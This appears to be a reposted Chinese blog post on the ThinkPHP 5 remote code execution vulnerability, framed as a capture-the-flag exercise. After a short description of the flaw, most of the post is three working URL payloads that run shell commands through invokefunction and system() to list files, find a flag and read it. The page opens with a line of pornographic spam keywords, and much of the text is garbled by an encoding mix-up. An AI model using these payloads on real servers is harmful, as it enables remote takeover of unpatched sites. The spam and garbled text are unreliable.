日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) >

ThinkPHP V5 漏洞利用

發(fā)布時(shí)間:2025/3/8 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ThinkPHP V5 漏洞利用 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

ThinkPHP 5漏洞簡(jiǎn)介

ThinkPHP官方2018年12月9日發(fā)布重要的安全更新,修復(fù)了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞。該更新主要涉及一個(gè)安全更新,由于框架對(duì)控制器名沒(méi)有進(jìn)行足夠的檢測(cè)會(huì)導(dǎo)致在沒(méi)有開(kāi)啟強(qiáng)制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦盡快更新到最新版本。

漏洞分析

程序未對(duì)控制器進(jìn)行過(guò)濾,導(dǎo)致攻擊者可以用 \(斜杠)調(diào)用任意類(lèi)方法。

漏洞利用
構(gòu)造payload:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“l(fā)s”);%27
尋找flag:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“find / -name ‘flag’”);%27

查看flag:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat …/…/…/flag”);%27

總結(jié)

以上是生活随笔為你收集整理的ThinkPHP V5 漏洞利用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。